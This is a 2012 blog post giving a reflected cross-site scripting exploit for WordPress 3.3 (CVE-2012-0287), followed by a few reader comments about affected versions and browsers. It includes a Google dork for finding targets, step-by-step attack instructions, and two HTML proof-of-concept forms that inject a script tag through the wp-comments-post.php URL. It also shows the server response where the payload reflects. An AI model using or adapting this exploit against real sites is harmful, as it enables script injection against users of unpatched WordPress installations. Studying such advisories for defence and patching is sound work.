Monday, 2 January 2012

Wordpress 3.3 XSS vulnerability







# Exploit Title: Reflected Cross Site Scripting in wordpress 3.3
# Google Dork: intext:"Proudly powered by WordPress"
# Date: 2.Jan.2012
# Author: Aditya Modha, Samir Shah
# Greetz: Jigar Soni, Mr 52
# Software Link: http://www.wordpress.org/download/
# Version: 3.3
# Tested on: apache
# CVE : CVE-2012-0287


Step 1: Post a comment to the target website

Step 2: Replace the value of author tag, email tag, comment tag with the exact value of what has been post in the last comment. Change the value of comment_post_ID to the value of post (which can be known by opening that post and checking the value of p parameter in the url). For example the if the url is http://192.168.1.102/wordpress/?p=6 then the value of comment_post_ID is 6.
<html>
<title>Wordpress 3.3 XSS PoC</title>

<body>

<form name="XSS" id="XSS" action="http://host/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script>
<style>" method="POST">
<input type="hidden" name="author" value="replace me">
<input type="hidden" name="email" value="replace me">
<input type="hidden" name="url" value="">
<input type="hidden" name="comment" value="replace me">
<input type="hidden" name="submit" value="Post Comment">
<input type="hidden" name="comment_post_ID" value="replace me">
<input type="hidden" name="comment_parent" value="0">
<input type="button" value="Click Me" />
</form>

</body>
</html>
Step 3: Publish the above html file on the web server and access it. Click on "Click Me" button. This will try to post the comment to wordpress which will flag this comment as duplicate comment with the 500 Internal server error response. Here our XSS payload will get executed. Check wordpress_3.3_xss.png file.

Step 4: The response code where XSS payload reflects is given below
<!DOCTYPE html>
<!-- Ticket #11289, IE bug fix: always pad the error page with enough characters such that it is greater than 512 bytes...
-->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <title>WordPress &rsaquo; Error</title>
 <style type="text/css">
  html {
   background: #f9f9f9;
  }
  body {
   background: #fff;
   color: #333;

               ..............snip....................

  .button {
   background: #f2f2f2 url(http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script>
<style>/wp-admin/images/white-grad.png) repeat-x scroll left top;
  }

  .button:active {
   background: #eee url(http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script>
<style>/wp-admin/images/white-grad-active.png) repeat-x scroll left top;
  }
   </style>
</head>
<body id="error-page">
 <p>Duplicate comment detected; it looks as though you&#8217;ve already said that!</p></body>
</html>


UPDATE: It will even work if you do not supply any comment data. Duplicate comment event is not necessary. And i forgot to mention that this will only work with Internet Explorer since other browser like firefox and chrome will url encode our XSS payload.


<html>
<title>Wordpress 3.3 XSS PoC</title>

<body>

<form name="XSS" id="XSS"  action="http://host/wp-comments-post.php?</style><script>document.write(Date())</script><style>" 
method="POST">
<input type="hidden" name="author" value="oldman">
<input type="hidden" name="email" value="oldmanlab@gmail.com">
<input type="hidden" name="url" value="">
<input type="hidden" name="comment" value="">
<input type="hidden" name="submit" value="Post Comment">
<input type="hidden" name="comment_post_ID" value="replace_me">
<input type="hidden" name="comment_parent" value="0">
<input type="submit" value="Click Me" />
</form>

</body>
</html>

5 comments:

  1. This depends on your web browser, this PoC works on IE but not on real good browsers like Ffox, chrome, safari, opera. IE deserves to die.

    ReplyDelete
  2. Does this work only with 3.3 or are older versions also affected ?

    ReplyDelete
  3. Only with 3.3, older versions were not affected.

    Also, IE9 will block this as well unless you disable the built in cross-site-scripting protection filter.

    ReplyDelete
  4. Moment, is the newest 3.3.2 also affected? I hope they fixed it in this release. Any info?

    ReplyDelete